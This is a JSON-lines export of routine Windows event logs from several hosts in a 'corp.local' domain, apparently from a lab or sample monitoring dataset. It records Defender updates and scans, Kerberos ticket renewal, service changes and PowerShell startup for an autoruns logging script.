{"EventTime":"2021-10-02T12:25:41.472062+05:45","Hostname":"IT01.corp.local","Keywords":"9223372036854784008","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":43,"SourceName":"Microsoft-Windows-WindowsUpdateClient","ProviderGuid":"{945A8954-C147-4ACD-923F-40C45405A658}","Version":1,"TaskValue":1,"OpcodeValue":13,"RecordNumber":26201,"ActivityID":"{1861A8E2-AEB2-0001-C704-6518B2AED701}","ExecutionProcessID":356,"ExecutionThreadID":3472,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Installation Started: Windows has started installing the following update: Security Intelligence Update for Microsoft Defender Antivirus - KB2267602 (Version 1.349.1764.0)","Category":"Windows Update Agent","Opcode":"Installation","updateTitle":"Security Intelligence Update for Microsoft Defender Antivirus - KB2267602 (Version 1.349.1764.0)","updateGuid":"{ff308918-dc38-46af-b26b-84c0adffca8d}","updateRevisionNumber":"200","EventReceivedTime":"2021-10-02T12:25:43.418694+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T10:55:57.888365+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":2011,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":22722,"ExecutionProcessID":2080,"ExecutionThreadID":1200,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus used Dynamic security intelligence Service to discard obsolete security intelligence updates.\r\n \tCurrent security intelligence Version: 1.349.1764.0\r\n \tSecurity intelligence Type: AntiVirus\r\n \tCurrent Engine Version: 1.1.18500.10\r\n \tDynamic security intelligence Type: Security intelligence update\r\n \tPersistence Path: C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\data\\66a0feba8fedd32c86ad1770e052c7e33931412c\r\n \tDynamic security intelligence Version: 0.0.0.0\r\n \tDynamic security intelligence Compilation Timestamp: 9/1/2021 10:15:42 AM\r\n \tRemoval Reason: Automatic\r\n \tPersistence Limit Type: Duration\r\n \tPersistence Limit: 150196224","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2108.7","Current security intelligence Version":"1.349.1764.0","Security intelligence Type Index":"1","Security intelligence Type":"AntiVirus","Current Engine Version":"1.1.18500.10","Dynamic security intelligence Type Index":"1","Dynamic security intelligence Type":"Security intelligence update","Persistence Path":"C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\data\\66a0feba8fedd32c86ad1770e052c7e33931412c","Dynamic security intelligence Version":"0.0.0.0","Dynamic security intelligence Compilation Timestamp":"9/1/2021 10:15:42 AM","Persistence Limit Type Index":"2","Persistence Limit Type":"Duration","Persistence Limit 
Value":"150196224","Removal Reason Index":"2","Removal Reason Value":"Automatic","EventReceivedTime":"2021-10-02T10:55:58.956132+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T12:25:59.004214+05:45","Hostname":"IT01.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":2000,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":16491,"ExecutionProcessID":2508,"ExecutionThreadID":2252,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus Security intelligence version has been updated.\r\n \tCurrent security intelligence Version: 1.349.1764.0\r\n \tPrevious security intelligence Version: 1.349.1731.0\r\n \tSecurity intelligence Type: AntiVirus\r\n \tUpdate Type: Delta\r\n \tUser: NT AUTHORITY\\SYSTEM\r\n \tCurrent Engine Version: 1.1.18500.10\r\n \tPrevious Engine Version: 1.1.18500.10","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2108.7","Current security intelligence Version":"1.349.1764.0","Previous security intelligence Version":"1.349.1731.0","User":"SYSTEM","SID":"S-1-5-18","Security intelligence Type Index":"1","Security intelligence Type":"AntiVirus","Update Type Index":"2","Update Type":"Delta","Current Engine Version":"1.1.18500.10","Previous Engine Version":"1.1.18500.10","EventReceivedTime":"2021-10-02T12:26:00.643350+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T12:26:04.505800+05:45","Hostname":"IT01.corp.local","Keywords":"9223372036854775832","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":19,"SourceName":"Microsoft-Windows-WindowsUpdateClient","ProviderGuid":"{945A8954-C147-4ACD-923F-40C45405A658}","Version":1,"TaskValue":1,"OpcodeValue":13,"RecordNumber":26202,"ActivityID":"{1861A8E2-AEB2-0001-C704-6518B2AED701}","ExecutionProcessID":356,"ExecutionThreadID":3472,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Installation Successful: Windows successfully installed the following update: Security Intelligence Update for Microsoft Defender Antivirus - KB2267602 (Version 1.349.1764.0)","Category":"Windows Update Agent","Opcode":"Installation","updateTitle":"Security Intelligence Update for Microsoft Defender Antivirus - KB2267602 (Version 1.349.1764.0)","updateGuid":"{ff308918-dc38-46af-b26b-84c0adffca8d}","updateRevisionNumber":"200","serviceGuid":"{9482f4b4-e343-43b6-b170-9a65bc822c77}","EventReceivedTime":"2021-10-02T12:26:05.768272+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T17:13:32.254042+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":15,"SourceName":"SecurityCenter","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":161650,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"Updated Windows Defender status successfully to SECURITY_PRODUCT_STATE_ON.","Opcode":"Info","Data":"Windows Defender","Data_1":"SECURITY_PRODUCT_STATE_ON","EventReceivedTime":"2021-10-02T17:13:33.098819+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T15:21:05.673512+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4770,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":14337,"OpcodeValue":0,"RecordNumber":190899141,"ExecutionProcessID":512,"ExecutionThreadID":3308,"Channel":"Security","Message":"A Kerberos service ticket was renewed.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tIT02$@corp.local\r\n\tAccount Domain:\t\tcorp.local\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::ffff:192.168.2.54\r\n\tClient Port:\t\t55396\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x10002\r\n\tTicket Encryption Type:\t0x12\r\n\r\nTicket options and encryption types are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"IT02$@corp.local","TargetDomainName":"corp.local","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2569713578-3403938347-3732993993-502","TicketOptions":"0x10002","TicketEncryptionType":"0x12","IpAddress":"::ffff:192.168.2.54","IpPort":"55396","EventReceivedTime":"2021-10-02T15:21:07.361002+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T11:10:05.735209+05:45","Hostname":"DC01.corp.local","Keywords":"4620693217682128896","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":1108,"SourceName":"Microsoft-Windows-Eventlog","ProviderGuid":"{FC65DDD8-D6EF-4962-83D5-6E5CFE9CE148}","Version":0,"TaskValue":101,"OpcodeValue":0,"RecordNumber":190895547,"ExecutionProcessID":888,"ExecutionThreadID":4896,"Channel":"Security","Message":"The event logging service encountered an error while processing an incoming event published from Microsoft-Windows-Security-Auditing.","Category":"Event processing","Opcode":"Info","UserData":"<EventProcessingFailure xmlns='http://manifests.microsoft.com/win/2004/08/windows/eventlog'><Error Code='15005'/><EventID>0</EventID><PublisherID>Microsoft-Windows-Security-Auditing</PublisherID></EventProcessingFailure>","EventReceivedTime":"2021-10-02T11:10:05.828984+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T17:12:48.856021+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1000,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":11648,"ExecutionProcessID":2484,"ExecutionThreadID":6484,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus scan has started.\r\n \tScan ID: {49BDA8E1-EC5E-428B-86C6-09AAB271778C}\r\n \tScan Type: Antimalware\r\n \tScan Parameters: Quick Scan\r\n \tScan Resources: \r\n \tUser: NT AUTHORITY\\SYSTEM","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2011.6","Scan ID":"{49BDA8E1-EC5E-428B-86C6-09AAB271778C}","Scan Type Index":"1","Scan Type":"Antimalware","Scan Parameters Index":"1","Scan Parameters":"Quick Scan","User":"SYSTEM","SID":"S-1-5-18","EventReceivedTime":"2021-10-02T17:12:50.778527+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T11:35:40.515153+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":1002,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":22727,"ExecutionProcessID":2080,"ExecutionThreadID":7392,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus scan has been stopped before completion.\r\n \tScan ID: {5B64D6BD-6C43-4ACD-952A-C35E28CC637F}\r\n \tScan Type: Antimalware\r\n \tScan Parameters: Quick Scan\r\n \tUser: NT AUTHORITY\\SYSTEM","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2108.7","Scan ID":"{5B64D6BD-6C43-4ACD-952A-C35E28CC637F}","Scan Type Index":"1","Scan Type":"Antimalware","Scan Parameters Index":"1","Scan Parameters":"Quick Scan","User":"SYSTEM","SID":"S-1-5-18","EventReceivedTime":"2021-10-02T11:35:42.087020+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T12:00:03.222568+05:45","Hostname":"IT03.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":6013,"SourceName":"EventLog","TaskValue":0,"RecordNumber":111200,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"The system uptime is 1559095 seconds.","EventData":"<Data></Data><Data></Data><Data></Data><Data></Data><Data>1559095</Data><Data>60</Data><Data>-345 Nepal Standard Time</Data><Binary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inary>","EventReceivedTime":"2021-10-02T12:00:03.816218+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T12:11:09.457145+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":36,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":56655,"ExecutionProcessID":1212,"ExecutionThreadID":1372,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time service has not synchronized the system time for the last 86400 seconds because none of the time service providers provided a usable time stamp. The time service will not update the local system time until it is able to synchronize with a time source. If the local system is configured to act as a time server for clients, it will stop advertising as a time source to clients after 0 seconds. The time service will continue to retry and sync time with its time sources. Check system event log for other W32time events for more details. Run 'w32tm /resync' to force an instant time synchronization. You can control the frequency of the time source rediscovery using ClockHoldoverPeriod W32time config setting. Modify the EventLogFlags W32time config setting if you wish to disable this message.","Opcode":"Info","EventData.Name":"TMP_EVENT_TIME_SOURCE_NONE","UnsynchronizedTimeSeconds":"86400","TimeRemainingToSetLocalClockFreeRunningSeconds":"0","EventReceivedTime":"2021-10-02T12:11:10.410966+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T13:07:02.170965+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12288,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":161539,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The client has sent an activation request to the key management service machine.\r\nInfo:\r\n0xC0020017, 0x00000000, :1688, efc25641-ea64-4338-a3a6-a870c4022da4, 2021/10/02 07:21, 1, 5, 0, 2de67392-b7a7-462a-b1ca-108dd189f588, 25","Data":"0xC0020017, 0x00000000, :1688, efc25641-ea64-4338-a3a6-a870c4022da4, 2021/10/02 07:21, 1, 5, 0, 2de67392-b7a7-462a-b1ca-108dd189f588, 25","EventData.Binary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ventReceivedTime":"2021-10-02T13:07:03.170889+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T12:25:53.922645+05:45","Hostname":"IT01.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5007,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":16489,"ExecutionProcessID":2508,"ExecutionThreadID":5800,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.\r\n \tOld value: \r\n \tNew value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\MpEngine\\MpCampRing = 0x4","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2108.7","New Value":"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\MpEngine\\MpCampRing = 0x4","EventReceivedTime":"2021-10-02T12:25:55.577829+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T12:50:15.120793+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":1067,"SourceName":"Microsoft-Windows-TerminalServices-RemoteConnectionManager","ProviderGuid":"{C76BAA63-AE81-421C-B425-340B4B24157F}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":56659,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"The RD Session Host server cannot register 'TERMSRV' Service Principal Name to be used for server authentication. The following error occured: The specified domain either does not exist or could not be contacted.\r\n.","Data":"The specified domain either does not exist or could not be contacted.\n","EventReceivedTime":"2021-10-02T12:50:15.809396+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T13:10:15.100213+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223372036854775808","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":2001,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":11641,"ExecutionProcessID":2484,"ExecutionThreadID":5768,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus has encountered an error trying to update security intelligence.\r\n \tNew security intelligence Version: \r\n \tPrevious security intelligence Version: 1.337.654.0\r\n \tUpdate Source: Microsoft Malware Protection Center\r\n \tSecurity intelligence Type: AntiVirus\r\n \tUpdate Type: Full\r\n \tUser: NT AUTHORITY\\NETWORK SERVICE\r\n \tCurrent Engine Version: \r\n \tPrevious Engine Version: 1.1.18100.5\r\n \tError code: 0x80072f8f\r\n \tError description: A security error occurred ","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2011.6","Previous security intelligence Version":"1.337.654.0","Update Source Index":"6","Update Source":"Microsoft Malware Protection Center","User":"NETWORK SERVICE","SID":"S-1-5-20","Security intelligence Type Index":"1","Security intelligence Type":"AntiVirus","Update Type Index":"1","Update Type":"Full","Previous Engine Version":"1.1.18100.5","Error Code":"0x80072f8f","Error Description":"A security error occurred ","Update State Index":"1","Update State":"Search","Source 
Path":"https://go.microsoft.com/fwlink/?LinkID=870379&clcid=0x409&arch=x64&eng=1.1.18100.5&avdelta=1.337.654.0&asdelta=1.337.654.0&prod=77BDAF73-B396-481F-9042-AD358843EC24&ostype=0&signaturetype=0&beta=0&plat=4.18.2011.6&OsVersion=10.0.19042.685","EventReceivedTime":"2021-10-02T13:10:16.562442+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T13:34:39.694146+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9227875636482146304","EventType":"AUDIT_FAILURE","SeverityValue":4,"Severity":"ERROR","EventID":4957,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13571,"OpcodeValue":0,"RecordNumber":896297,"ActivityID":"{63A5CF36-AEB8-0000-A6CF-A563B8AED701}","ExecutionProcessID":672,"ExecutionThreadID":5472,"Channel":"Security","Message":"Windows Firewall did not apply the following rule:\r\n\r\nRule Information:\r\n\tID:\tCoreNet-Teredo-In\r\n\tName:\tCore Networking - Teredo (UDP-In)\r\n\r\nError Information:\r\n\tReason:\tLocal Port resolved to an empty set.","Category":"MPSSVC Rule-Level Policy Change","Opcode":"Info","RuleId":"CoreNet-Teredo-In","RuleName":"Core Networking - Teredo (UDP-In)","RuleAttr":"Local Port","EventReceivedTime":"2021-10-02T13:34:41.420301+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:56:45.904100+05:45","Hostname":"IT03.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5860,"SourceName":"Microsoft-Windows-WMI-Activity","ProviderGuid":"{1418EF04-B0B4-4623-BF7E-D74AB47BBDAA}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":20309,"ActivityID":"{C4CABCCB-A926-0000-0DBB-CCC426A9D701}","ExecutionProcessID":1904,"ExecutionThreadID":2716,"Channel":"Microsoft-Windows-WMI-Activity/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Namespace = ROOT\\CIMV2; NotificationQuery = SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName = 'wsmprovhost.exe'; UserName = NT AUTHORITY\\SYSTEM; ClientProcessID = 3408, ClientMachine = IT03; PossibleCause = Temporary","Opcode":"Info","UserData":"<Operation_TemporaryEssStarted xmlns='http://manifests.microsoft.com/win/2006/windows/WMI'><NamespaceName>ROOT\\CIMV2</NamespaceName><Query>SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName = 'wsmprovhost.exe'</Query><User>NT AUTHORITY\\SYSTEM</User><Processid>3408</Processid><ClientMachine>IT03</ClientMachine><PossibleCause>Temporary</PossibleCause></Operation_TemporaryEssStarted>","EventReceivedTime":"2021-10-02T18:56:47.848423+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:56:45.937451+05:45","Hostname":"IT03.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4799,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13826,"OpcodeValue":0,"RecordNumber":40730144,"ActivityID":"{C4CABCCB-A926-0000-82BE-CAC426A9D701}","ExecutionProcessID":632,"ExecutionThreadID":2052,"Channel":"Security","Message":"A security-enabled local group membership was enumerated.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT03$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nGroup:\r\n\tSecurity ID:\t\tS-1-5-32-544\r\n\tGroup Name:\t\tAdministrators\r\n\tGroup Domain:\t\tBuiltin\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0xd50\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe","Category":"Security Group Management","Opcode":"Info","TargetUserName":"Administrators","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-544","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT03$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","CallerProcessId":"0xd50","CallerProcessName":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2021-10-02T18:56:46.832708+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:58:54.081390+05:45","Hostname":"IT03.corp.local","Keywords":"9259400833873739776","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7040,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":111249,"ExecutionProcessID":612,"ExecutionThreadID":6828,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start.","param1":"Background Intelligent Transfer Service","param2":"auto start","param3":"demand start","param4":"BITS","EventReceivedTime":"2021-10-02T18:58:55.737674+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T16:45:02.523435+05:45","Hostname":"IT03.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":600,"SourceName":"PowerShell","TaskValue":6,"RecordNumber":402406,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Windows PowerShell","Message":"Provider \"Alias\" is Started. \r\n\r\nDetails: \r\n\tProviderName=Alias\r\n\tNewProviderState=Started\r\n\r\n\tSequenceNumber=3\r\n\r\n\tHostName=ConsoleHost\r\n\tHostVersion=5.1.17763.1971\r\n\tHostId=6caa4573-d7c9-47fa-9821-6edb0451c0ca\r\n\tHostApplication=powershell.exe -WindowStyle hidden c:\\PROGRA~1\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n\tEngineVersion=\r\n\tRunspaceId=\r\n\tPipelineId=\r\n\tCommandName=\r\n\tCommandType=\r\n\tScriptName=\r\n\tCommandPath=\r\n\tCommandLine=","Category":"Provider Lifecycle","Opcode":"Info","EventData":"<Data>Alias</Data><Data>Started</Data><Data>\tProviderName=Alias\r\n\tNewProviderState=Started\r\n\r\n\tSequenceNumber=3\r\n\r\n\tHostName=ConsoleHost\r\n\tHostVersion=5.1.17763.1971\r\n\tHostId=6caa4573-d7c9-47fa-9821-6edb0451c0ca\r\n\tHostApplication=powershell.exe -WindowStyle hidden c:\\PROGRA~1\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n\tEngineVersion=\r\n\tRunspaceId=\r\n\tPipelineId=\r\n\tCommandName=\r\n\tCommandType=\r\n\tScriptName=\r\n\tCommandPath=\r\n\tCommandLine=</Data>","EventReceivedTime":"2021-10-02T16:45:02.664106+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T16:45:02.523435+05:45","Hostname":"IT03.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":400,"SourceName":"PowerShell","TaskValue":4,"RecordNumber":402411,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Windows PowerShell","Message":"Engine state is changed from None to Available. \r\n\r\nDetails: \r\n\tNewEngineState=Available\r\n\tPreviousEngineState=None\r\n\r\n\tSequenceNumber=13\r\n\r\n\tHostName=ConsoleHost\r\n\tHostVersion=5.1.17763.1971\r\n\tHostId=6caa4573-d7c9-47fa-9821-6edb0451c0ca\r\n\tHostApplication=powershell.exe -WindowStyle hidden c:\\PROGRA~1\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n\tEngineVersion=5.1.17763.1971\r\n\tRunspaceId=7c4e8408-2681-4c41-8e5b-84bf86b519c5\r\n\tPipelineId=\r\n\tCommandName=\r\n\tCommandType=\r\n\tScriptName=\r\n\tCommandPath=\r\n\tCommandLine=","Category":"Engine Lifecycle","Opcode":"Info","EventData":"<Data>Available</Data><Data>None</Data><Data>\tNewEngineState=Available\r\n\tPreviousEngineState=None\r\n\r\n\tSequenceNumber=13\r\n\r\n\tHostName=ConsoleHost\r\n\tHostVersion=5.1.17763.1971\r\n\tHostId=6caa4573-d7c9-47fa-9821-6edb0451c0ca\r\n\tHostApplication=powershell.exe -WindowStyle hidden c:\\PROGRA~1\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n\tEngineVersion=5.1.17763.1971\r\n\tRunspaceId=7c4e8408-2681-4c41-8e5b-84bf86b519c5\r\n\tPipelineId=\r\n\tCommandName=\r\n\tCommandType=\r\n\tScriptName=\r\n\tCommandPath=\r\n\tCommandLine=</Data>","EventReceivedTime":"2021-10-02T16:45:02.664106+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T16:45:02.325256+05:45","Hostname":"IT03.corp.local","Keywords":"0","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":40961,"SourceName":"Microsoft-Windows-PowerShell","ProviderGuid":"{A0C1853B-5C40-4B15-8766-3CF1C58F985A}","Version":1,"TaskValue":4,"OpcodeValue":1,"RecordNumber":708639,"ActivityID":"{C4CABCCB-A926-0000-84AD-CCC426A9D701}","ExecutionProcessID":6928,"ExecutionThreadID":1316,"Channel":"Microsoft-Windows-PowerShell/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"PowerShell console is starting up","Category":"PowerShell Console Startup","Opcode":"Start","EventData":"","EventReceivedTime":"2021-10-02T16:45:03.678420+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T16:45:02.542194+05:45","Hostname":"IT03.corp.local","Keywords":"0","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":40962,"SourceName":"Microsoft-Windows-PowerShell","ProviderGuid":"{A0C1853B-5C40-4B15-8766-3CF1C58F985A}","Version":1,"TaskValue":4,"OpcodeValue":2,"RecordNumber":708641,"ActivityID":"{C4CABCCB-A926-0000-84AD-CCC426A9D701}","ExecutionProcessID":6928,"ExecutionThreadID":1316,"Channel":"Microsoft-Windows-PowerShell/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"PowerShell console is ready for user input","Category":"PowerShell Console Startup","Opcode":"Stop","EventData":"","EventReceivedTime":"2021-10-02T16:45:03.693979+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
